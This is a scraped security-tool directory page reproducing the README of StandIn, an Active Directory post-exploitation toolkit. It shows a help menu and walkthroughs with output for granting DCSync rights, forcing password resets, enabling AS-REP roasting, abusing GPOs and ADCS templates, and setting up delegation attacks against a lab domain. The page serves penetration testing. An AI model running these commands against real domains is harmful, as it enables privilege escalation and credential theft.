Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
StandIn — StandIn은 작은 .NET35/45 AD 사후 익스플로잇 툴킷입니다. | Kitploit
도구/GitHubGitHub/fuzzysecurity/standin
Privilege EscalationExploitationLateral MovementPost-ExploitationPenetration TestingDNS Analysis
GitHubfuzzysecurity/standin

StandIn

StandIn은 작은 .NET35/45 AD 사후 익스플로잇 툴킷입니다.

저장소 보기
8641404년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

StandIn

StandIn은 작은 AD 사후 침투 툴킷입니다. StandIn은 최근 xforcered에서 리소스 기반 제한 위임(resource based constrained delegation)을 수행할 .NET 네이티브 솔루션이 필요했기 때문에 탄생했습니다. 그러나 StandIn은 다양한 편의 기능을 포함하도록 빠르게 확장되었습니다.

저는 디렉터리 서비스 프로그래밍에 대해 더 배우고 AD 사후 침투 툴체인에 적합한 도구를 확장하기 위해 StandIn 개발을 계속하고자 합니다.

로드맵

기여하기

기여는 언제나 환영합니다. 풀 리퀘스트에는 다음 항목이 포함되어야 합니다: 기능 설명, 간단한 기술 설명 및 샘플 출력.

PR 없이 StandIn에 추가되길 원하는 기능이 있으신가요? 가능한 한 자세히 기능을 설명하여 이슈를 열어주세요.

할 일

다음 항목들은 StandIn의 후속 버전에서 구현할 예정입니다.

  • 도메인 공유 열거. 이는 두 부분으로 나눌 수 있습니다: (1) 사용자 홈 디렉터리/스크립트 경로/프로필 경로를 기반으로 고유한 목록을 찾고 가져오기, (2) fTDfs/msDFS-Linkv2 개체 쿼리.
  • GPO를 찾고 파싱하여 사용자를 호스트 로컬 그룹에 매핑.
  • GPO -> OU 및 OU -> GPO.
  • 정책 함수 재작성(아마도).
  • 일부 함수에 JSON/XML 출력을 선택적으로 추가하여 스크립팅 지원.
  • 코드 리팩토링, 더 나은 모듈화 및 클래스 분할이 필요.

주제 참고 자료

  • An ACE up the sleeve (@_wald0 & @harmj0y) - 여기
  • Kerberoasting (@xpn) - 여기
  • AS-REP 로스팅 (@harmj0y) - 여기
  • Kerberos Unconstrained Delegation (@spotheplanet) - 여기
  • S4U2Pwnage (@harmj0y) - 여기
  • Resource-based Constrained Delegation (@spotheplanet) - 여기
  • Rubeus - 여기
  • Powerview - 여기
  • Powermad (@kevin_robertson) - 여기
  • SharpGPOAbuse (@den_n1s & @pkb1s) - 여기
  • adidnsdump (@_dirkjan) - 여기
  • Certified Pre-Owned (@harmj0y & @tifkin_) - 여기

색인

  • 도움말
  • LDAP 개체 작업
    • Raw LDAP
    • 개체 가져오기
    • 개체 액세스 권한 가져오기
    • 개체 액세스 권한 부여
    • 개체 암호 설정
    • 개체 플래그에 ASREP 추가
    • 개체 플래그에서 ASREP 제거
  • SID
  • ASREP
  • PASSWD_NOTREQD
  • SPN
    • SPN 수집
    • SPN 설정
  • 제한 없음 / 제한 / 리소스 기반 제한 위임
  • DC
  • 트러스트
  • GPO 작업
    • GPO 목록
    • GPO 로컬 관리자 추가
    • GPO 사용자 권한 추가
    • GPO 즉시 작업 추가
    • GPO 사용자/컴퓨터 버전 증가
  • 정책
  • DNS
  • 그룹 작업
    • 그룹 구성원 목록
    • 그룹에 사용자 추가/제거
  • 컴퓨터 개체 작업
    • 컴퓨터 개체 생성
    • 컴퓨터 개체 비활성화
    • 컴퓨터 개체 삭제
    • msDS-AllowedToActOnBehalfOfOtherIdentity 추가
    • msDS-AllowedToActOnBehalfOfOtherIdentity 제거
  • Active Directory 인증서 서비스(ADCS)
    • 목록
    • 클라이언트 인증
    • ENROLLEE_SUPPLIES_SUBJECT
    • PEND_ALL_REQUESTS
    • 소유자 변경

도움말```

__ ( / _// ~b33f __)/(//)(/(/) v1.4

----> Args? <----<

--help This help menu --object LDAP filter, e.g. samaccountname=HWest --ldap LDAP filter, can return result collection --filter Filter results, varies based on function --limit Limit results, varies based on function, defaults to 50 --computer Machine name, e.g. Celephais-01 --group samAccountName, e.g. "Necronomicon Admins" --ntaccount User name, e.g. "REDHOOK\UPickman" --sid Dependent on context --grant User name, e.g. "REDHOOK\KMason" --guid Rights GUID to add to object, e.g. 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 --domain Domain name, e.g. REDHOOK --user User name --pass Password --newpass New password to set for object --gpo List group policy objects --acl Show ACL's for returned GPO's --localadmin Add samAccountName to BUILTIN\Administrators for vulnerable GPO --setuserrights samAccountName for which to add token rights in a vulnerable GPO --tasktype Immediate task type (user/computer) --taskname Immediate task name --author Immediate task author --command Immediate task command --args Immediate task command args --target Optional, filter for DNS name or NTAccount --targetsid Optional, provider user SID --increase Increment either the user or computer GPO version number for the AD object --policy Reads some account/kerberos properties from the "Default Domain Policy" --dns Performs ADIDNS enumeration, supports wildcard filters --legacy Boolean, sets DNS seach root to legacy (CN=System) --forest Boolean, sets DNS seach root to forest (DC=ForestDnsZones) --passnotreq Boolean, list accounts that have PASSWD_NOTREQD set --type Rights type: GenericAll, GenericWrite, ResetPassword, WriteMembers, DCSync --spn Boolean, list kerberoastable accounts --setspn samAccountName for which to add/remove an SPN --principal Principal name to add to samAccountName (e.g. MSSQL/VermisMysteriis) --delegation Boolean, list accounts with unconstrained / constrained delegation --asrep Boolean, list ASREP roastable accounts --dc Boolean, list all domain controllers --trust Boolean, list all trust relationships --adcs List all CA's and all published templates --clientauth Boolean, modify ADCS template to add/remove "Client Authentication" --ess Boolean, modify ADCS template to add/remove "ENROLLEE_SUPPLIES_SUBJECT" --pend Boolean, modify ADCS template to add/remove "PEND_ALL_REQUESTS" --owner Boolean, modify ADCS template owner --write Boolean, modify ADCS template, add/remove WriteDacl/WriteOwner/WriteProperty permission for NtAccount --enroll Boolean, modify ADCS template, add/remove "Certificate-Enrollment" permission for NtAccount --add Boolean, context dependent group/spn/adcs --remove Boolean, context dependent msDS-AllowedToActOnBehalfOfOtherIdentity/group/adcs --make Boolean, make machine; ms-DS-MachineAccountQuota applies --disable Boolean, disable machine; should be the same user that created the machine --access Boolean, list access permissions for object --delete Boolean, delete machine from AD; requires elevated AD access

----> Usage? <----<

Perform LDAP search

StandIn.exe --ldap "(&(samAccountType=805306368)(servicePrincipalName=)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))" StandIn.exe --ldap servicePrincipalName= --domain redhook --user RFludd --pass Cl4vi$Alchemi4e --limit 10 StandIn.exe --ldap servicePrincipalName=* --filter "pwdlastset, distinguishedname, lastlogon" --limit 100

Query object properties by LDAP filter

StandIn.exe --object "(&(samAccountType=805306368)(servicePrincipalName=vermismysteriis.redhook.local))" StandIn.exe --object samaccountname=Celephais-01$ --domain redhook --user RFludd --pass Cl4vi$Alchemi4e StandIn.exe --object samaccountname=Celephais-01$ --filter "pwdlastset, serviceprincipalname, objectsid"

Query object access permissions, optionally filter by NTAccount

StandIn.exe --object "distinguishedname=DC=redhook,DC=local" --access StandIn.exe --object samaccountname=Rllyeh$ --access --ntaccount "REDHOOK\EDerby" StandIn.exe --object samaccountname=JCurwen --access --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Grant object access permissions

StandIn.exe --object "distinguishedname=DC=redhook,DC=local" --grant "REDHOOK\MBWillett" --type DCSync StandIn.exe --object "distinguishedname=DC=redhook,DC=local" --grant "REDHOOK\MBWillett" --guid 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 StandIn.exe --object samaccountname=SomeTarget001$ --grant "REDHOOK\MBWillett" --type GenericWrite --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Set object password

StandIn.exe --object samaccountname=SomeTarget001$ --newpass "Arkh4mW1tch!" StandIn.exe --object samaccountname=BJenkin --newpass "Dr34m1nTh3H#u$e" --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Add ASREP to userAccountControl flags

StandIn.exe --object samaccountname=HArmitage --asrep StandIn.exe --object samaccountname=FMorgan --asrep --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Remove ASREP from userAccountControl flags

StandIn.exe --object samaccountname=TMalone --asrep --remove StandIn.exe --object samaccountname=RSuydam --asrep --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Get a list of all ASREP roastable accounts

StandIn.exe --asrep StandIn.exe --asrep --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Return GPO objects, optionally wildcard filter and get ACL's

StandIn.exe --gpo --limit 20 StandIn.exe --gpo --filter admin --domain redhook --user RFludd --pass Cl4vi$Alchemi4e StandIn.exe --gpo --filter admin --acl --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Add samAccountName to BUILTIN\Administrators for vulnerable GPO

StandIn.exe --gpo --filter ArcanePolicy --localadmin JCurwen StandIn.exe --gpo --filter ArcanePolicy --localadmin JCurwen --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Add token rights to samAccountName in a vulnerable GPO

StandIn.exe --gpo --filter ArcanePolicy --setuserrights JCurwen --grant "SeTcbPrivilege,SeDebugPrivilege" StandIn.exe --gpo --filter ArcanePolicy --setuserrights JCurwen --grant SeLoadDriverPrivilege --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Add user/computer immediate task and optionally filter

StandIn.exe --gpo --filter ArcanePolicy --taskname LiberInvestigationis --tasktype computer --author "REDHOOK\JCurwen" --command "C:\Windows\System32\notepad.exe" --args "C:\Mysteriis\CultesDesGoules.txt" StandIn.exe --gpo --filter ArcanePolicy --taskname LiberInvestigationis --tasktype computer --author "REDHOOK\JCurwen" --command "C:\Windows\System32\notepad.exe" --args "C:\Mysteriis\CultesDesGoules.txt" --target Rllyeh.redhook.local StandIn.exe --gpo --filter ArcanePolicy --taskname LiberInvestigationis --tasktype user --author "REDHOOK\JCurwen" --command "C:\Windows\System32\notepad.exe" --args "C:\Mysteriis\CultesDesGoules.txt" --target "REDHOOK\RBloch" --targetsid S-1-5-21-315358687-3711474269-2098994107-1106 StandIn.exe --gpo --filter ArcanePolicy --taskname LiberInvestigationis --tasktype computer --author "REDHOOK\JCurwen" --command "C:\Windows\System32\notepad.exe" --args "C:\Mysteriis\CultesDesGoules.txt" --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Increment either the user or computer GPO version number for the AD object

StandIn.exe --gpo --filter ArcanePolicy --increase --tasktype user StandIn.exe --gpo --filter ArcanePolicy --increase --tasktype computer --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Read Default Domain Policy

StandIn.exe --policy StandIn.exe --policy --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Perform ADIDNS searches

StandIn.exe --dns --limit 20 StandIn.exe --dns --filter SQL --limit 10 StandIn.exe --dns --forest --domain redhook --user RFludd --pass Cl4vi$Alchemi4e StandIn.exe --dns --legacy --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

List account that have PASSWD_NOTREQD set

StandIn.exe --passnotreq StandIn.exe --passnotreq --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Get user and SID from either a SID or a samAccountName

StandIn.exe --sid JCurwen StandIn.exe --sid S-1-5-21-315358687-3711474269-2098994107-1105 --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Get a list of all kerberoastable accounts

StandIn.exe --spn StandIn.exe --spn --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Add/remove SPN from samAccountName

StandIn.exe --setspn RSuydam --principal MSSQL/VermisMysteriis --add StandIn.exe --setspn RSuydam --principal MSSQL/VermisMysteriis --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

List all accounts with unconstrained & constrained delegation privileges

StandIn.exe --delegation StandIn.exe --delegation --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Get a list of all domain controllers

StandIn.exe --dc

Get a list of all trust relationships in the current domain

StandIn.exe --trust

List members of group or list user group membership

StandIn.exe --group Literarum StandIn.exe --group "Magna Ultima" --domain redhook --user RFludd --pass Cl4vi$Alchemi4e StandIn.exe --group JCurwen --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Add user to group

StandIn.exe --group "Dunwich Council" --ntaccount "REDHOOK\WWhateley" --add StandIn.exe --group DAgon --ntaccount "REDHOOK\RCarter" --add --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Remove user from group

StandIn.exe --group "Dunwich Council" --ntaccount "REDHOOK\WWhateley" --remove StandIn.exe --group DAgon --ntaccount "REDHOOK\RCarter" --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

List CA's and all published templates, optionally wildcard filter on template name

StandIn.exe --adcs StandIn.exe --adcs --filter Kingsport StandIn.exe --adcs --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Add/remove "Client Authentication" from template pKIExtendedKeyUsage, filter should contain the exact name of the template

StandIn.exe --adcs --filter Kingsport --clientauth --add StandIn.exe --adcs --filter Kingsport --clientauth --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Add/remove "ENROLLEE_SUPPLIES_SUBJECT" from template msPKI-Certificate-Name-Flag, filter should contain the exact name of the template

StandIn.exe --adcs --filter Kingsport --ess --add StandIn.exe --adcs --filter Kingsport --ess --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Add/remove "PEND_ALL_REQUESTS" from template msPKI-Enrollment-Flag, filter should contain the exact name of the template

StandIn.exe --adcs --filter Kingsport --pend --add StandIn.exe --adcs --filter Kingsport --pend --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Change template owner, filter should contain the exact name of the template

StandIn.exe --adcs --filter Kingsport --ntaccount "REDHOOK\MBWillett" --owner StandIn.exe --adcs --filter Kingsport --ntaccount "REDHOOK\MBWillett" --owner --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Grant NtAccount WriteDacl/WriteOwner/WriteProperty, filter should contain the exact name of the template

StandIn.exe --adcs --filter Kingsport --ntaccount "REDHOOK\MBWillett" --write --add StandIn.exe --adcs --filter Kingsport --ntaccount "REDHOOK\MBWillett" --write --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Grant NtAccount "Certificate-Enrollment", filter should contain the exact name of the template

StandIn.exe --adcs --filter Kingsport --ntaccount "REDHOOK\MBWillett" --enroll --add StandIn.exe --adcs --filter Kingsport --ntaccount "REDHOOK\MBWillett" --enroll --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Create machine object

StandIn.exe --computer Innsmouth --make StandIn.exe --computer Innsmouth --make --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Disable machine object

StandIn.exe --computer Arkham --disable StandIn.exe --computer Arkham --disable --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Delete machine object

StandIn.exe --computer Danvers --delete StandIn.exe --computer Danvers --delete --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Add msDS-AllowedToActOnBehalfOfOtherIdentity to machine object properties

StandIn.exe --computer Providence --sid S-1-5-21-1085031214-1563985344-725345543 StandIn.exe --computer Providence --sid S-1-5-21-1085031214-1563985344-725345543 --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

Remove msDS-AllowedToActOnBehalfOfOtherIdentity from machine object properties

StandIn.exe --computer Miskatonic --remove StandIn.exe --computer Miskatonic --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

root@kitploit:~
## LDAP 개체 작업
모든 `--object` 작업은 LDAP 필터가 단일 개체를 반환할 것으로 예상하며, 쿼리가 더 많은 결과를 반환하면 종료됩니다. 이는 의도된 설계입니다. 개체 배열을 가져오려면 `--ldap`을 사용해야 합니다.

### 원시 LDAP

#### 사용 사례

> *운영상으로, AD 개체 배열을 검색하고 선택적으로 결과와 속성을 필터링 및/또는 제한하려는 경우가 있습니다.*

#### 구문

해결된 개체의 모든 속성을 가져옵니다. 쿼리는 단일 속성에 대한 간단한 일치 또는 복잡한 LDAP 필터일 수 있습니다. 선택적으로 `--limit`을 사용하여 반환되는 결과를 제한할 수 있습니다.```
C:\> StandIn.exe --ldap "(&(displayName=*)(gpcfilesyspath=*))" --filter "gpcfilesyspath,versionnumber"

[?] Using DC : m-w16-dc01.main.redhook.local
[+] LDAP search result count : 3
    |_ Result limit          : 50

[?] Iterating result properties
    |_ Applying property filter => gpcfilesyspath,versionnumber

[?] Object   : CN={6AC1786C-016F-11D2-945F-00C04fB984F9}
    Path     : LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=redhook,DC=local
[+] versionnumber
    |_ User Version     : 0
    |_ Computer Version : 1
[+] gpcfilesyspath
    |_ \\redhook.local\sysvol\redhook.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}

[?] Object   : CN={31B2F340-016D-11D2-945F-00C04FB984F9}
    Path     : LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=redhook,DC=local
[+] versionnumber
    |_ User Version     : 0
    |_ Computer Version : 11
[+] gpcfilesyspath
    |_ \\redhook.local\sysvol\redhook.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}

[?] Object   : CN={58890948-8DE3-4A39-8C40-F68004186693}
    Path     : LDAP://CN={58890948-8DE3-4A39-8C40-F68004186693},CN=Policies,CN=System,DC=redhook,DC=local
[+] versionnumber
    |_ User Version     : 2
    |_ Computer Version : 4
[+] gpcfilesyspath
    |_ \\redhook.local\SysVol\redhook.local\Policies\{58890948-8DE3-4A39-8C40-F68004186693}

Get object

Use Case

운영상 특정 AD 개체의 모든 속성을 확인해야 할 수 있습니다. 일반적인 예로는 사용자 계정이 속한 그룹이나 사용자 계정이 도메인에 마지막으로 인증한 시간을 확인하는 것입니다.

Syntax

해결된 개체를 반환합니다. 쿼리는 단일 속성에 대한 단순 일치 또는 복잡한 LDAP 필터일 수 있습니다. 선택적으로 --filter를 사용하여 가져올 속성을 필터링할 수 있습니다.``` C:> StandIn.exe --object samaccountname=m-10-1909-01$

[?] Using DC : m-w16-dc01.main.redhook.local [?] Object : CN=M-10-1909-01 Path : LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local

[?] Iterating object properties

[+] logoncount |_ 360 [+] codepage |_ 0 [+] objectcategory |_ CN=Computer,CN=Schema,CN=Configuration,DC=main,DC=redhook,DC=local [+] iscriticalsystemobject |_ False [+] operatingsystem |_ Windows 10 Enterprise [+] usnchanged |_ 195797 [+] instancetype |_ 4 [+] name |_ M-10-1909-01 [+] badpasswordtime |_ 0x0 [+] pwdlastset |_ 10/9/2020 4:42:02 PM UTC [+] serviceprincipalname |_ TERMSRV/M-10-1909-01 |_ TERMSRV/m-10-1909-01.main.redhook.local |_ WSMAN/m-10-1909-01 |_ WSMAN/m-10-1909-01.main.redhook.local |_ RestrictedKrbHost/M-10-1909-01 |_ HOST/M-10-1909-01 |_ RestrictedKrbHost/m-10-1909-01.main.redhook.local |_ HOST/m-10-1909-01.main.redhook.local [+] objectclass |_ top |_ person |_ organizationalPerson |_ user |_ computer [+] badpwdcount |_ 0 [+] samaccounttype |_ SAM_MACHINE_ACCOUNT [+] lastlogontimestamp |_ 11/1/2020 7:40:09 PM UTC [+] usncreated |_ 31103 [+] objectguid |_ 17c80232-2ee6-47e1-9ab5-22c51c268cf0 [+] localpolicyflags |_ 0 [+] whencreated |_ 7/9/2020 4:59:55 PM [+] adspath |_ LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local [+] useraccountcontrol |_ WORKSTATION_TRUST_ACCOUNT [+] cn |_ M-10-1909-01 [+] countrycode |_ 0 [+] primarygroupid |_ 515 [+] whenchanged |_ 11/2/2020 7:59:32 PM [+] operatingsystemversion |_ 10.0 (18363) [+] dnshostname |_ m-10-1909-01.main.redhook.local [+] dscorepropagationdata |_ 10/30/2020 6:56:30 PM |_ 10/25/2020 1:28:32 AM |_ 7/16/2020 2:15:26 PM |_ 7/15/2020 8:54:17 PM |_ 1/1/1601 12:04:17 AM [+] lastlogon |_ 11/3/2020 10:21:11 AM UTC [+] distinguishedname |_ CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local [+] msds-supportedencryptiontypes |_ RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96 [+] samaccountname |_ M-10-1909-01$ [+] objectsid |_ S-1-5-21-1293271031-3053586410-2290657902-1126 [+] lastlogoff |_ 0 [+] accountexpires |_ 0x7FFFFFFFFFFFFFFF

root@kitploit:~
### 객체 액세스 권한 가져오기

#### 사용 사례

> *특정 작업 단계에서 운영자는 AD 내 특정 객체에 대한 액세스 권한을 확인하고자 할 수 있습니다. 많은 권한이 접근 범위를 확장하거나 목표를 달성할 수 있는 운영적 경로를 제공할 수 있습니다. 예를 들어, 그룹에 대한 WriteDacl 권한은 운영자가 자신에게 그룹에 새 사용자를 추가할 수 있는 권한을 부여할 수 있도록 허용할 수 있습니다. [SharpHound](https://github.com/BloodHoundAD/SharpHound3)와 같은 도구는 이미 여러 경우에 이러한 Dacl 취약점을 드러냅니다.*

#### 구문

해결된 객체에 적용되는 Active Directory 규칙을 검색하고 스키마/권한 GUID를 해당 친숙한 이름으로 변환합니다. 선택적으로 NTAccount 이름으로 결과를 필터링합니다.```
C:\>StandIn.exe --object samaccountname=m-10-1909-01$ --access

[?] Using DC : m-w19-dc01.main.redhook.local
[?] Object   : CN=M-10-1909-01
    Path     : LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local

[+] Object properties
    |_ Owner : MAIN\domainjoiner
    |_ Group : MAIN\Domain Join

[+] Object access rules

[+] Identity --> NT AUTHORITY\SELF
    |_ Type       : Allow
    |_ Permission : CreateChild, DeleteChild
    |_ Object     : ANY

[+] Identity --> NT AUTHORITY\Authenticated Users
    |_ Type       : Allow
    |_ Permission : GenericRead
    |_ Object     : ANY
    
    [... Snip ...]

C:\> StandIn.exe --object samaccountname=m-10-1909-01$ --access --ntaccount "MAIN\domainjoiner"

[?] Using DC : m-w19-dc01.main.redhook.local
[?] Object   : CN=M-10-1909-01
    Path     : LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local

[+] Object properties
    |_ Owner : MAIN\domainjoiner
    |_ Group : MAIN\Domain Join

[+] Object access rules

[+] Identity --> MAIN\domainjoiner
    |_ Type       : Allow
    |_ Permission : DeleteTree, ExtendedRight, Delete, GenericRead
    |_ Object     : ANY

[+] Identity --> MAIN\domainjoiner
    |_ Type       : Allow
    |_ Permission : WriteProperty
    |_ Object     : User-Account-Restrictions

[+] Identity --> MAIN\domainjoiner
    |_ Type       : Allow
    |_ Permission : Self
    |_ Object     : servicePrincipalName

[+] Identity --> MAIN\domainjoiner
    |_ Type       : Allow
    |_ Permission : Self
    |_ Object     : dNSHostName

[+] Identity --> MAIN\domainjoiner
    |_ Type       : Allow
    |_ Permission : WriteProperty
    |_ Object     : sAMAccountName

[+] Identity --> MAIN\domainjoiner
    |_ Type       : Allow
    |_ Permission : WriteProperty
    |_ Object     : displayName

[+] Identity --> MAIN\domainjoiner
    |_ Type       : Allow
    |_ Permission : WriteProperty
    |_ Object     : description

[+] Identity --> MAIN\domainjoiner
    |_ Type       : Allow
    |_ Permission : WriteProperty
    |_ Object     : User-Logon

[+] Identity --> MAIN\domainjoiner
    |_ Type       : Allow
    |_ Permission : Self
    |_ Object     : DS-Validated-Write-Computer

개체 액세스 권한 부여

사용 사례

적절한 권한이 있는 경우, 운영자는 AD의 특정 개체에 대해 NTAccount에 특별한 권한을 부여할 수 있습니다. 예를 들어, 운영자가 사용자 계정에 대해 GenericAll 권한을 가지고 있으면, 현재 비밀번호를 모르더라도 사용자의 비밀번호를 변경할 수 있는 권한을 자신이나 제3의 NTAccount에 부여할 수 있습니다.

구문

확인된 개체에 대해 지정된 NTAccount에 권한을 추가합니다. StandIn은 사전 정의된 소수의 권한(GenericAll, GenericWrite, ResetPassword, WriteMembers, DCSync)을 지원하지만, 운영자가 --guid 플래그를 사용하여 사용자 지정 권한 guid를 지정할 수도 있습니다.``` C:> whoami main\s4uuser

C:> StandIn.exe --group lowPrivButMachineAccess

[?] Using DC : m-w19-dc01.main.redhook.local [?] Group : lowPrivButMachineAccess GUID : 37e3d957-af52-4cc6-8808-56330f8ec882

[+] Members

[?] Path : LDAP://CN=s4uUser,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local samAccountName : s4uUser Type : User SID : S-1-5-21-1293271031-3053586410-2290657902-1197

C:> StandIn.exe --object "distinguishedname=DC=main,DC=redhook,DC=local" --access --ntaccount "MAIN\lowPrivButMachineAccess"

[?] Using DC : m-w19-dc01.main.redhook.local [?] Object : DC=main Path : LDAP://DC=main,DC=redhook,DC=local

[+] Object properties |_ Owner : BUILTIN\Administrators |_ Group : BUILTIN\Administrators

[+] Object access rules

[+] Identity --> MAIN\lowPrivButMachineAccess |_ Type : Allow |_ Permission : WriteDacl |_ Object : ANY

C:> StandIn.exe --object "distinguishedname=DC=main,DC=redhook,DC=local" --grant "MAIN\s4uuser" --type DCSync

[?] Using DC : m-w19-dc01.main.redhook.local [?] Object : DC=main Path : LDAP://DC=main,DC=redhook,DC=local

[+] Object properties |_ Owner : BUILTIN\Administrators |_ Group : BUILTIN\Administrators

[+] Set object access rules |_ Success, added dcsync privileges to object for MAIN\s4uuser

C:> StandIn.exe --object "distinguishedname=DC=main,DC=redhook,DC=local" --access --ntaccount "MAIN\s4uUser"

[?] Using DC : m-w19-dc01.main.redhook.local [?] Object : DC=main Path : LDAP://DC=main,DC=redhook,DC=local

[+] Object properties |_ Owner : BUILTIN\Administrators |_ Group : BUILTIN\Administrators

[+] Object access rules

[+] Identity --> MAIN\s4uUser |_ Type : Allow |_ Permission : ExtendedRight |_ Object : DS-Replication-Get-Changes-All

[+] Identity --> MAIN\s4uUser |_ Type : Allow |_ Permission : ExtendedRight |_ Object : DS-Replication-Get-Changes

[+] Identity --> MAIN\s4uUser |_ Type : Allow |_ Permission : ExtendedRight |_ Object : DS-Replication-Get-Changes-In-Filtered-Set

root@kitploit:~
### 개체 암호 설정

#### 사용 사례

> *만약 운영자가 사용자 개체에 대해 `User-Force-Change-Password` 권한을 가지고 있다면, 현재 비밀번호를 모르더라도 해당 사용자 계정의 비밀번호를 변경할 수 있습니다. 이 작업은 파괴적입니다. 사용자가 더 이상 인증할 수 없게 되어 경보를 울릴 수 있기 때문입니다.*

#### 구문

현재 비밀번호를 모르고 확인된 개체의 비밀번호를 설정합니다.```
C:\> whoami
main\s4uuser

C:\> StandIn.exe --object "samaccountname=user005" --access --ntaccount "MAIN\lowPrivButMachineAccess"

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object   : CN=User 005
    Path     : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

[+] Object properties
    |_ Owner : MAIN\Domain Admins
    |_ Group : MAIN\Domain Admins

[+] Object access rules

[+] Identity --> MAIN\lowPrivButMachineAccess
    |_ Type       : Allow
    |_ Permission : WriteDacl
    |_ Object     : ANY

C:\> StandIn.exe --object "samaccountname=user005" --grant "MAIN\s4uuser" --type resetpassword

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object   : CN=User 005
    Path     : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

[+] Object properties
    |_ Owner : MAIN\Domain Admins
    |_ Group : MAIN\Domain Admins

[+] Set object access rules
    |_ Success, added resetpassword privileges to object for MAIN\s4uuser

C:\> StandIn.exe --object "samaccountname=user005" --access --ntaccount "MAIN\s4uUser"

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object   : CN=User 005
    Path     : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

[+] Object properties
    |_ Owner : MAIN\Domain Admins
    |_ Group : MAIN\Domain Admins

[+] Object access rules

[+] Identity --> MAIN\s4uUser
    |_ Type       : Allow
    |_ Permission : ExtendedRight
    |_ Object     : User-Force-Change-Password

C:\> StandIn.exe --object "samaccountname=user005" --newpass "Arkh4mW1tch!"

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object   : CN=User 005
    Path     : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

[+] Object properties
    |_ Owner : MAIN\Domain Admins
    |_ Group : MAIN\Domain Admins

[+] Setting account password
    |_ Success, password set for object

객체 플래그에서 ASREP 추가/제거

사용 사례

운영자가 사용자 계정에 대한 쓰기 권한을 가지고 있다면, 해당 사용자의 userAccountControl 플래그를 수정하여 DONT_REQUIRE_PREAUTH를 포함시킬 수 있습니다. 이렇게 하면 운영자가 해당 사용자의 AS-REP 해시를 요청할 수 있으며, 이는 오프라인에서 크랙할 수 있습니다. 이 과정은 kerberoasting과 매우 유사합니다. 이 작업은 파괴적이지 않지만, 사용자가 합리적인 시간 내에 크랙될 수 있는 비밀번호를 가지고 있다는 사실에 의존합니다.

구문

해결된 객체의 userAccountControl 플래그에서 DONT_REQUIRE_PREAUTH를 추가 및 제거합니다.``` C:> StandIn.exe --object "samaccountname=user005" --asrep

[?] Using DC : m-w16-dc01.main.redhook.local [?] Object : CN=User 005 Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

